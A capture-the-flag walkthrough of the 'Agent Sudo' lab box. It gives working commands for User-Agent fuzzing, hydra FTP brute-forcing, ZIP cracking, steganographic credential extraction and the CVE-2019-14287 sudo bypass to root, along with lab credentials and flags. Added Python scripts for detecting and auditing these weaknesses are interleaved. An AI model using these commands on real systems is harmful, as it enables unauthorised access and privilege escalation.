Overview
A secret server hidden in the deep sea. The mission: abuse HTTP User-Agent sniffing
to discover a hidden page, chain FTP credentials + ZIP cracking + steganography to
exfil SSH credentials, land a shell as james, then exploit
CVE-2019-14287 (sudo !root bypass) to pop root.
Multi-layered chain with stego, crypto, and a real-world CVE.
nmap → 21/FTP, 22/SSH, 80/HTTP
↓
User-Agent: C → agent_C_attention.php → username "chris"
↓
hydra FTP brute-force → chris:crystal
↓
FTP files: cutie.png (embedded ZIP) + cute-alien.jpg (steghide)
↓
ZIP crack → "alien" → Base64 decode → "Area51"
↓
steghide extract → james:hackerrules!
↓
SSH as james → user flag: b03d975e8c92a7c04146cfa7a5a313c7
↓
CVE-2019-14287: sudo -u#-1 /bin/bash → root
↓
root flag: b53a02f55b57d4439e3341834d70c062
Port Scan & Service Discovery
$ nmap -sV -sC -T4 -p- --min-rate 3000 -Pn 10.49.129.194
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 | Brute-force target |
| 22/tcp | SSH | OpenSSH 7.6p1 | Final access vector |
| 80/tcp | HTTP | Apache 2.4.29 | User-Agent sniffing |
Three open ports. The web server holds the first clue.
User-Agent Sniffing — Agent C
The landing page instructs agents to use their codename as the User-Agent header:
$ for letter in {A..Z}; do wget -S -O /dev/null --header="User-Agent: $letter" http://10.49.129.194/ 2>&1 | grep "Location:"; done
Location: agent_C_attention.php
[Agent C triggers 302 redirect]
Attention chris, Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! From, Agent R
Agent C’s real name: chris — with a confirmed weak password.
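From the defender's side, the loop above leaves a very recognisable trace: one client hitting the same URL with a run of one-character User-Agent values in a few seconds, followed by a 302 and a request for the hidden page. The script below is an added example (not part of the original writeup) that runs that detection over a few constructed Apache combined-log lines; the IPs, timestamps and the 10.0.0.9 browser line are assumptions, while the `/agent_C_attention.php` path and the 302 behaviour come from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample Apache combined-log lines (not taken from the original writeup).
# 10.0.0.5 cycles through single-letter User-Agent values the way the wget loop does;
# 10.0.0.9 is an ordinary browser and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "A"
10.0.0.5 - - [10/Oct/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "B"
10.0.0.5 - - [10/Oct/2024:12:00:02 +0000] "GET / HTTP/1.1" 302 0 "-" "C"
10.0.0.5 - - [10/Oct/2024:12:00:02 +0000] "GET /agent_C_attention.php HTTP/1.1" 200 300 "-" "C"
10.0.0.5 - - [10/Oct/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "D"
10.0.0.9 - - [10/Oct/2024:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("req").split()
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": parts[1] if len(parts) > 1 else "",
        "status": int(m.group("status")),
        "ua": m.group("ua"),
    }


def find_ua_fuzzing(lines, window_seconds=60, min_distinct=4, max_ua_len=3,
                    hidden_path="/agent_C_attention.php"):
    """Return {ip: stats} for clients that present at least min_distinct different
    very short User-Agent strings inside any window_seconds-long window."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        short = [r for r in recs if 0 < len(r["ua"]) <= max_ua_len]
        best = 0
        for i, start in enumerate(short):  # sliding window over short-UA requests only
            seen = set()
            for r in short[i:]:
                if (r["ts"] - start["ts"]).total_seconds() > window_seconds:
                    break
                seen.add(r["ua"])
            best = max(best, len(seen))
        if best >= min_distinct:
            findings[ip] = {
                "distinct_short_uas": best,
                "redirects": sum(1 for r in short if r["status"] == 302),
                "hidden_page_hits": sum(1 for r in recs if r["path"] == hidden_path),
            }
    return findings


if __name__ == "__main__":
    for ip, stats in find_ua_fuzzing(SAMPLE_LOG.splitlines()).items():
        print(f"[!] {ip}: {stats}")
```

The same sliding-window count over one client's failed-login records is the natural detection for the hydra step that follows; only the line parser changes. The real fix, of course, is not to gate content on a client-controlled header at all.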
FTP Brute-Force & File Extraction
$ hydra -l chris -P /tmp/rockyou.txt ftp://10.49.129.194 -t 10 -f
[21][ftp] host: 10.49.129.194 login: chris password: crystal
Three files downloaded via FTP:
| File | Purpose |
|---|---|
| To_agentJ.txt | Hint: password hidden inside one of the images |
| cutie.png | Contains embedded AES-encrypted ZIP archive |
| cute-alien.jpg | Contains steghide-embedded SSH credentials |
Image → ZIP → Base64 → Steghide → Creds
Layer 1: Extract embedded ZIP from cutie.png
$ zsteg cutie.png
extradata:0 .. file: Zip archive data (AES Encrypted)
Contents: To_agentR.txt
$ dd if=cutie.png bs=1 skip=34562 of=hidden.zip
Layer 2: Crack the ZIP password
$ zip2john hidden.zip > hash.txt
$ john hash.txt --format=ZIP --wordlist=/tmp/rockyou.txt
alien (hidden.zip/To_agentR.txt)
$ 7z x -palien hidden.zip
Layer 3: Decode the Base64 string
$ cat To_agentR.txt
We need to send the picture to 'QXJlYTUx' as soon as possible!
$ echo "QXJlYTUx" | base64 -d
Area51
Layer 4: Extract SSH creds from cute-alien.jpg
$ steghide extract -sf cute-alien.jpg -p "Area51"
wrote extracted data to "message.txt"
$ cat message.txt
Hi james,
Your login password is hackerrules!
Four layers deep: PNG → ZIP → Base64 → steghide → james:hackerrules!
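Layer 1 works because a PNG decoder stops at the IEND chunk and ignores whatever follows, so a ZIP appended to the file survives untouched; zsteg's `extradata` check and the `skip=34562` fed to `dd` are both just "where does IEND end?". The script below is an added example (not from the original writeup) of that check done by hand: it walks the chunk stream, verifies each CRC, reports the byte offset at which trailing data starts and names it by magic bytes. The 1x1 PNG it builds for sample input is constructed here; the challenge's cutie.png is not reproduced.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Magic bytes worth recognising in the region after IEND
# (a ZIP local-file header is what the writeup found in cutie.png).
TRAILER_MAGICS = {
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"\x1f\x8b": "gzip",
    b"7z\xbc\xaf\x27\x1c": "7z",
}


def _chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_minimal_png():
    """Construct a valid 1x1 RGB PNG as sample input (constructed, not the challenge file)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, depth, RGB, ...
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")      # filter byte + one black pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def find_trailing_data(blob):
    """Walk the chunk stream to IEND and return (offset_after_iend, trailing_bytes).
    Raises ValueError on anything that is not a well-formed PNG up to IEND."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(blob):
            raise ValueError(f"truncated chunk {ctype!r}")
        body = blob[pos + 4:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:end])
        if zlib.crc32(body) & 0xFFFFFFFF != crc:  # tampering inside the stream shows up here
            raise ValueError(f"bad CRC on chunk {ctype!r}")
        pos = end
        if ctype == b"IEND":
            return pos, blob[pos:]
    raise ValueError("no IEND chunk found")


def classify_trailer(trailing):
    """Name the format of appended data by its magic bytes ('none' if nothing follows IEND)."""
    if not trailing:
        return "none"
    for magic, name in TRAILER_MAGICS.items():
        if trailing.startswith(magic):
            return name
    return "unknown"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:  # demo: a clean PNG with a fake ZIP header glued on
        data = build_minimal_png() + b"PK\x03\x04" + b"\x00" * 26
    offset, trailing = find_trailing_data(data)
    print(f"IEND ends at byte {offset}; {len(trailing)} trailing bytes ({classify_trailer(trailing)})")
    if trailing:
        print(f"carve with: dd if=<file> bs=1 skip={offset} of=trailer.bin")
```

Run against a real file with `python3 png_trailer.py cutie.png` (file name assumed); the printed offset is the value that belongs in `dd skip=`. The same "parse to the format's end marker, then look at what is left" approach is how a file-upload gateway or mail filter can reject polyglot images before they reach a share.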
SSH — User Shell & Flag
$ ssh james@10.49.129.194
Password: hackerrules!
$ cat ~/user_flag.txt
b03d975e8c92a7c04146cfa7a5a313c7
Home directory also contains Alien_autospy.jpg — depicting the Roswell alien autopsy (1947/1995).
CVE-2019-14287 — sudo !root Bypass
$ sudo -l
User james may run the following commands:
    (ALL, !root) /bin/bash
The rule intends to let james run /bin/bash as any user except root.
However, CVE-2019-14287 (sudo < 1.8.28) allows bypassing the
!root restriction by specifying UID -1, which sudo
incorrectly resolves to UID 0 (root).
$ sudo -u#-1 /bin/bash
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)
# cat /root/root.txt
b53a02f55b57d4439e3341834d70c062
Agent R’s real identity: DesKel
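The rule that made this possible is easy to find before an attacker does: any sudoers entry that grants `ALL` and then carves out exceptions with `!` depends on a deny-list, and on sudo below 1.8.28 the deny-list does not hold. The script below is an added example (not part of the original writeup) that audits `sudo -l` text for that pattern and compares a `sudo -V` version line against the fix release. The hostname and the second `www-data` rule in the sample output are assumptions; the `(ALL, !root) /bin/bash` line is the one the page shows.

```python
import re

# Constructed `sudo -l` output. The hostname and the www-data rule are assumptions;
# the (ALL, !root) rule is the one found on the target in the writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
    (www-data) NOPASSWD: /usr/bin/less /var/log/apache2/access.log
"""

# '(runas_users[:runas_groups]) [TAG: ...] command' as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")
FIXED_IN = (1, 8, 28)  # upstream release that fixed CVE-2019-14287


def parse_rule(line):
    """Turn one rule line into a dict, or return None for non-rule lines."""
    m = RULE_RE.match(line)
    if not m:
        return None
    runas_users = m.group("runas").split(":")[0]  # drop the optional ':group' part
    entries = [e.strip() for e in runas_users.split(",") if e.strip()]
    return {
        "cmd": m.group("cmd"),
        "tags": m.group("tags").split(),
        "allowed": [e for e in entries if not e.startswith("!")],
        "denied": [e[1:] for e in entries if e.startswith("!")],
    }


def audit_sudo_rules(lines):
    """Flag rules of the form (ALL, !user): a blanket allow narrowed only by negation.
    On sudo < 1.8.28 the exclusion is bypassed by a numeric UID that resolves to 0;
    on fixed versions it is still fragile (a second UID-0 account is not named by '!root')."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if rule and "ALL" in rule["allowed"] and rule["denied"]:
            findings.append({
                "cmd": rule["cmd"],
                "denied": rule["denied"],
                "advice": "replace 'ALL, !...' with an explicit runas list, e.g. "
                          "(<user1>, <user2>) " + rule["cmd"] + ", and upgrade sudo to >= 1.8.28",
            })
    return findings


def is_vulnerable_version(sudo_v_output):
    """True when the upstream version in `sudo -V` output predates the 1.8.28 fix.
    Distributions backport fixes without changing this number, so treat True as
    'check the package changelog', not as proof."""
    m = VERSION_RE.search(sudo_v_output)
    if not m:
        raise ValueError("no 'Sudo version x.y.z' line found")
    return tuple(int(x) for x in m.groups()) < FIXED_IN


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_OUTPUT.splitlines()):
        print(f"[!] {f['cmd']}: allow ALL minus {f['denied']} -> {f['advice']}")
    print("version check:", is_vulnerable_version("Sudo version 1.8.21p2"))
```

In practice you would pipe `sudo -l` and `sudo -V` from each host into these two functions; the version check only tells you whether the upstream number is old, so on Ubuntu 18.04 and similar, where the fix was backported, read the package changelog before calling a host vulnerable. The rule check is the one that matters on any version: a `!root` carve-out is a deny-list, and deny-lists in sudoers have a long record of surprising their authors.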
Attack Chain
1. User-Agent: C → reveals username chris with weak password
2. FTP brute-force → chris:crystal → 3 files downloaded
3. ZIP crack (alien) → Base64 (Area51) → steghide → SSH creds
4. SSH as james:hackerrules! → User flag: b03d975e8c92a7c04146cfa7a5a313c7
5. sudo -u#-1 /bin/bash → Root flag: b53a02f55b57d4439e3341834d70c062
Vulnerabilities
| Finding | Location | Severity | Impact |
|---|---|---|---|
| CVE-2019-14287 (sudo !root bypass) | sudoers / sudo < 1.8.28 | Critical | Full root via UID -1 overflow |
| Hardcoded SSH creds in steganography | cute-alien.jpg | Critical | Direct SSH access as james |
| Weak FTP password (chris:crystal) | FTP (21) | High | File download, credential chain starts |
| User-Agent based access control | HTTP (80) | High | Username disclosure via header manipulation |
| Weak ZIP password (alien) | Embedded in cutie.png | Medium | Crackable with rockyou in seconds |
Takeaways
Weak passwords: both the FTP account (chris:crystal) and the ZIP archive (alien) fell
to rockyou instantly. Enforce minimum complexity and length.
Full-Chain Exploit Script
The complete chain is automated in agent_sudo_pwn.sh — port scan,
User-Agent fuzzing, FTP brute-force, stego extraction chain, SSH access, and
CVE-2019-14287 privilege escalation.
$ chmod +x agent_sudo_pwn.sh
$ ./agent_sudo_pwn.sh 10.49.129.194
[+] Agent C → chris (weak password confirmed)
[+] FTP creds: chris:crystal
[+] ZIP password: alien
[+] Steghide passphrase: Area51
[+] SSH creds: james:hackerrules!
[FLAG] user_flag: b03d975e8c92a7c04146cfa7a5a313c7
[FLAG] root_flag: b53a02f55b57d4439e3341834d70c062
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service detection |
| wget | User-Agent fuzzing and FTP file retrieval |
| hydra | FTP credential brute-force |
| zsteg | PNG steganography analysis |
| dd | Embedded file extraction from PNG |
| john | ZIP password cracking |
| 7z | AES-encrypted ZIP extraction |
| steghide | JPEG steganography extraction |
| sshpass | Automated SSH access |
| agent_sudo_pwn.sh | Full-chain automated exploit (Bash) |